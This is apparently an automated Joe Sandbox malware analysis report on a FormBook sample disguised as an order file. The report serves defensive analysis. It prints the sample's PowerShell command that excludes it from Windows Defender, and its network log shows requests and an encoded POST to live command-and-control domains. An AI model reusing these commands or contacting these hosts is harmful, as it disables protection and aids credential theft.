Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
spec 4008670601 AZTEK Order.exe

Overview

General Information

Sample name:spec 4008670601 AZTEK Order.exe
Analysis ID:1467079
MD5:f07575dcccaa8b88972464b50b63b017
SHA1:7949418fc5d9d6fd76c1d0349fc8dce96d777e1d
SHA256:6ce9c6e014f84badeec8435e6e781fbde6946dc45b627aff3a307e4dee1f0934
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • spec 4008670601 AZTEK Order.exe (PID: 1008 cmdline: "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe" MD5: F07575DCCCAA8B88972464B50B63B017)
    • powershell.exe (PID: 6136 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • spec 4008670601 AZTEK Order.exe (PID: 2244 cmdline: "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe" MD5: F07575DCCCAA8B88972464B50B63B017)
      • OFEkXEMCZC.exe (PID: 400 cmdline: "C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • compact.exe (PID: 3432 cmdline: "C:\Windows\SysWOW64\compact.exe" MD5: 5CB107F69062D6D387F4F7A14737220E)
          • OFEkXEMCZC.exe (PID: 5776 cmdline: "C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7156 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2ae20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1444f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ae20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1444f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000E.00000002.4564754025.00000000050C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        6.2.spec 4008670601 AZTEK Order.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          6.2.spec 4008670601 AZTEK Order.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e1c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x177f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          6.2.spec 4008670601 AZTEK Order.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            6.2.spec 4008670601 AZTEK Order.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2d3c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x169f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe", ParentImage: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, ParentProcessId: 1008, ParentProcessName: spec 4008670601 AZTEK Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe", ProcessId: 6136, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe", ParentImage: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, ParentProcessId: 1008, ParentProcessName: spec 4008670601 AZTEK Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe", ProcessId: 6136, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe", ParentImage: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe, ParentProcessId: 1008, ParentProcessName: spec 4008670601 AZTEK Order.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe", ProcessId: 6136, ProcessName: powershell.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.architect-usschool.com/s24g/Avira URL Cloud: Label: malware
            Source: http://www.architect-usschool.com/s24g/?Bp=2LpD8tLh&7Dihs8p=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM=Avira URL Cloud: Label: malware
            Source: http://architect-usschool.com/s24g/?Bp=2LpD8tLh&7Dihs8p=4rIlPCx72NWCI0QJXJwDAvira URL Cloud: Label: malware
            Source: http://yg08.gowi0i.xyzAvira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: spec 4008670601 AZTEK Order.exeReversingLabs: Detection: 23%
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.4564754025.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4561997871.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2526010135.0000000001700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4561941727.0000000004890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2527736172.00000000038C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: spec 4008670601 AZTEK Order.exeJoe Sandbox ML: detected
            Source: spec 4008670601 AZTEK Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: spec 4008670601 AZTEK Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: compact.pdbGCTL source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2525813902.0000000001238000.00000004.00000020.00020000.00000000.sdmp, OFEkXEMCZC.exe, 0000000A.00000002.4559414120.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OFEkXEMCZC.exe, 0000000A.00000000.2448002882.0000000000AEE000.00000002.00000001.01000000.0000000C.sdmp, OFEkXEMCZC.exe, 0000000E.00000000.2595889432.0000000000AEE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000C.00000003.2528050856.0000000003528000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000003.2525747236.0000000003377000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: QgGC.pdbSHA256 source: spec 4008670601 AZTEK Order.exe
            Source: Binary string: wntdll.pdb source: spec 4008670601 AZTEK Order.exe, spec 4008670601 AZTEK Order.exe, 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, compact.exe, compact.exe, 0000000C.00000003.2528050856.0000000003528000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000003.2525747236.0000000003377000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: compact.pdb source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2525813902.0000000001238000.00000004.00000020.00020000.00000000.sdmp, OFEkXEMCZC.exe, 0000000A.00000002.4559414120.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: QgGC.pdb source: spec 4008670601 AZTEK Order.exe
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DDC170 FindFirstFileW,FindNextFileW,FindClose,12_2_02DDC170
            Source: C:\Windows\SysWOW64\compact.exeCode function: 4x nop then xor eax, eax12_2_02DC96F0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 4x nop then mov ebx, 00000004h12_2_03A2053F

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.hellokong.xyz
            Source: Joe Sandbox ViewIP Address: 64.190.62.22 64.190.62.22
            Source: Joe Sandbox ViewIP Address: 203.161.49.220 203.161.49.220
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /jmiz/?Bp=2LpD8tLh&7Dihs8p=FlIs+r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p/5DHHhHlE1nDIZgKO5qXvVh1+gwmyYcA+2CCaGrmZckpjuvJQ96WUy8TtzIG0Do= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.fondazionegtech.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /92z0/?7Dihs8p=Gchg326o6RWN/XFADw/V4eD2MO3apSP8yQOPkbolGTbWXGJL1kFLipwvr6KFDeoH1MC+XiIJPCdl50bZjywkZNBk97uFxrq9QGi9z8UXs1GhAfMLlFrOVkcHu0q9EP6WPl8Zh5k=&Bp=2LpD8tLh HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.mengistiebethlehem.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /oc7s/?Bp=2LpD8tLh&7Dihs8p=ITz00edB1Uq7JDbRPTK5B57t89T2WQZ+hnFFsCQVLpiDf2LeJizgG+jH2jz5I+TBlRR/yAoHWWMQTB4d0WCMdZHpvgPMtRMFWqdBjyYGuisLgsnAd4XsPoSnl82L2CWvs48fsL0= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.ad14.funUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /2769/?7Dihs8p=rQ9MRvShllEvhf19NmQGPjdBfvwxqGfh/iQ/JyzvIKd3JVnhiEf6Ad8S1fm4YmYs4WBXtXN2+GWeVsdjOCq4N3yCg9FNbaHUg89/agQhGCosY8uNQEp6VxplmSeNniynJ3fH1F8=&Bp=2LpD8tLh HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.epicbazaarhub.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /wvam/?Bp=2LpD8tLh&7Dihs8p=ppN4Kg7gaCRo+jf4iLEmna60kcJd+oo7/wZIRMT4+Man5OlGV28GmQNPMVld/mi8klF/kBnYjgc4RUC2chY7WuIAYm4xk+Ll6sKGI2rWgbxJmoqgO5rVx7RJwqzCMQvvfrLjQU4= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.rz6grmvv.shopUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /oui5/?7Dihs8p=SBbMJInblZiNUqJtj2t3oAZeaf7w1Mr63FaPzYR5npk3jTg+edZF9NME4tF9tViJCHx7c4tSq6N/qcOwzg98IChDG2ekcZOWcYJRK2znKimA3GQ/fbvAwxxdlKlVh8HBUwdv3Sg=&Bp=2LpD8tLh HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.hellokong.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /s24g/?Bp=2LpD8tLh&7Dihs8p=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.architect-usschool.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /3jr0/?7Dihs8p=C6nbN3Z6SrmD48dKFL5Pdr+cZFmYp1QsQ3e628IyGZcRZCB2vhKb6ox4g6I37OYbmAVSFMbRXnVDWcusSAPk0vfQfIagm0ASlZK02lSA38wn9PDfH1oUKWJrxTMbBcOAU+1qziI=&Bp=2LpD8tLh HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.easybackpage.netUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /mwa4/?Bp=2LpD8tLh&7Dihs8p=BKtoJfTGgHJzrpd1kXP6JuCpnJS0Vaq/yhZppoO2EP353cwV9Kf7u0HM3e0YD5Mg8P8TnPOgCoBiwA2kvNm9UdnLeQplEPepVbn/svzmQdla2L+ZsYtoIxEUyzWZOW0K59hRfLs= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.superunicornpalace.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /rxdf/?7Dihs8p=n5pckC1kDFTF1S5BKIsmiJ5ryDhRlCYaQVQlc2liktwXiyajKP48Wkncu6FoMqtxFtMv+2TSpEcAsDV+dI8BV0td651LvJeUOcJvnAipjtqBUQAoEW2kSo5oIr+iYWP+5LowsUg=&Bp=2LpD8tLh HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.tedjp-x.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /n8zi/?Bp=2LpD8tLh&7Dihs8p=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXePjBpDkk8R6CbNZjNtV+M1xTH1M7WEFVhsxtrVg+jjfEC0sBsxKcDNAG8QmzJp6ywkUHIkWAXYoQO53dC+2pPrw= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.3cubesinterior.inUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /s0j2/?7Dihs8p=BcB93STIeRzesDqYzmgjF/8Aqg2qoGbugvfC7gVQd0Epq+RTfyEF6eLz+ZShIqPWgjFYuR+pkePM3whd8giEyH2988JCuLY+vIFLWxAqbBoWpgzIu1DPnhlaAUBnkOtEvd711RA=&Bp=2LpD8tLh HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.artvectorcraft.storeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /pv57/?7Dihs8p=6UcJOPuI3ds3m8dRFaGqe18kk0aRE6C9zfep+6iQQcPKXv8sEJKo1I2dFrwlAwFzKSJLgqMZnt8gW4RLGDqdj2op7I/d7Qwx4DLM/Sb7UzOzABLy3akf6gQBeurdxZRPhPoEffE=&Bp=2LpD8tLh HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.hondamechanic.todayUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficDNS traffic detected: DNS query: www.fondazionegtech.org
            Source: global trafficDNS traffic detected: DNS query: www.mengistiebethlehem.com
            Source: global trafficDNS traffic detected: DNS query: www.ad14.fun
            Source: global trafficDNS traffic detected: DNS query: www.epicbazaarhub.com
            Source: global trafficDNS traffic detected: DNS query: www.rz6grmvv.shop
            Source: global trafficDNS traffic detected: DNS query: www.hellokong.xyz
            Source: global trafficDNS traffic detected: DNS query: www.architect-usschool.com
            Source: global trafficDNS traffic detected: DNS query: www.easybackpage.net
            Source: global trafficDNS traffic detected: DNS query: www.superunicornpalace.com
            Source: global trafficDNS traffic detected: DNS query: www.tedjp-x.com
            Source: global trafficDNS traffic detected: DNS query: www.3cubesinterior.in
            Source: global trafficDNS traffic detected: DNS query: www.artvectorcraft.store
            Source: global trafficDNS traffic detected: DNS query: www.macklaer.com
            Source: global trafficDNS traffic detected: DNS query: www.hondamechanic.today
            Source: unknownHTTP traffic detected: POST /92z0/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cache-Control: max-age=0Content-Length: 212Content-Type: application/x-www-form-urlencodedConnection: closeHost: www.mengistiebethlehem.comOrigin: http://www.mengistiebethlehem.comReferer: http://www.mengistiebethlehem.com/92z0/User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoData Raw: 37 44 69 68 73 38 70 3d 4c 65 4a 41 30 41 61 6c 79 6c 37 66 7a 6a 68 30 51 6d 2f 39 39 4d 72 45 4a 50 50 7a 71 78 44 4b 30 31 43 64 70 62 77 42 4f 6a 65 6f 58 56 74 76 31 6d 52 76 69 75 63 6d 2f 4e 7a 39 63 65 78 42 31 4f 79 54 54 58 6b 57 4d 53 64 62 39 56 37 41 75 78 49 44 59 4b 6b 2b 37 2f 4c 6b 33 6f 61 6a 63 31 69 2f 34 38 67 32 2b 31 47 53 41 2f 4d 6e 7a 6c 54 44 46 6d 73 76 6a 32 71 4a 4b 73 6d 42 55 47 49 4c 38 76 55 64 47 53 39 55 66 68 32 69 37 39 54 70 45 31 32 34 42 58 65 75 61 57 32 4b 51 78 69 41 54 5a 31 30 2f 44 71 73 6d 32 43 63 6f 75 64 57 52 63 31 71 47 45 37 66 4f 69 6b 43 42 6a 74 78 54 4b 63 73 33 38 52 73 Data Ascii: 7Dihs8p=LeJA0Aalyl7fzjh0Qm/99MrEJPPzqxDK01CdpbwBOjeoXVtv1mRviucm/Nz9cexB1OyTTXkWMSdb9V7AuxIDYKk+7/Lk3oajc1i/48g2+1GSA/MnzlTDFmsvj2qJKsmBUGIL8vUdGS9Ufh2i79TpE124BXeuaW2KQxiATZ10/Dqsm2CcoudWRc1qGE7fOikCBjtxTKcs38Rs
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:51:46 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 14879Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 eb 96 eb 36 92 35 f8 fb e4 53 c0 f2 b2 53 b2 05 89 ba e5 85 4a 65 95 af 5d fe a6 dc f6 aa e3 ea 9a 6f 6c af 5c 20 19 22 71 12 04 58 00 28 a5 8e 2a 1f e6 5b f3 16 f3 b7 5f 6c 02 a4 ee a2 94 ca 4b 77 75 77 5e 48 22 10 b1 63 c7 8e 7d f3 c9 b7 3f 7d f3 cb ff fe f9 3b 92 d8 54 dc 9e dd b8 17 11 4c c6 a3 5a 66 e9 d7 7f a9 b9 18 b0 e8 f6 ec dd 4d 0a 96 91 30 61 da 80 1d d5 fe fa cb f7 f4 aa 46 da ab 1b c9 52 18 d5 26 1c a6 99 d2 b6 46 42 25 2d 48 cc 9c f2 c8 26 a3 08 26 3c 04 5a 1c 9a 84 4b 6e 39 13 d4 84 4c c0 a8 53 e0 6c c0 9c 6b 15 28 6b ce 57 20 e7 29 7b a0 3c 65 31 d0 4c 83 6b e2 0b a6 63 38 2f 0a 2d b7 02 6e 7f fe f7 ff 13 73 89 08 ff fe ff 2a 02 d2 95 6a 16 31 f2 f9 a7 57 dd 4e 67 48 20 e3 61 c0 3e 32 a6 93 3c 68 85 2a bd 69 97 85 67 37 82 cb 7b a2 41 8c ce 23 69 5c 87 31 d8 30 39 27 09 7e 8d ce db ed bd d2 b2 ef aa ac c6 84 05 2d 99 85 1a b1 b3 0c 75 60 59 26 78 c8 2c 57 b2 ad 8d f9 f2 21 15 78 e5 da 8d 6a df 03 44 24 63 9a ed 53 22 9f 6b f6 f7 5c 0d 6b 65 eb 5a 62 6d 66 fc 0a 02 ed 31 82 b4 6b af a6 11 01 6a 9c a2 c4 ff fe 7f 34 57 e6 d5 b4 f0 df a1 99 4d 7e 26 d4 3c b3 b7 67 53 2e 23 35 6d dd 4d 33 48 d5 07 fe 1e ac e5 32 36 64 44 e6 b5 80 19 f8 ab 16 35 7f 81 fd 5b fb b7 b6 69 4d 5b 4a c7 bf b5 8b c5 9b df 10 5c c3 6f ed a2 f8 b7 76 67 d0 f2 5a bd df da 97 dd 87 cb ee 6f ed 5a b3 06 0f 16 eb 5b 99 8c f1 60 26 f1 cb f0 b0 b0 40 c3 f7 77 25 20 7e b9 b3 ca 75 08 35 7f 5e 43 67 a1 a4 45 d9 02 bf 80 df 13 e3 b7 f6 34 a3 5c 86 22 8f 5c b7 0f a6 08 14 75 14 d7 05 38 72 2b e5 b2 f5 c1 fc 61 02 7a 74 d1 1a b4 06 b5 c7 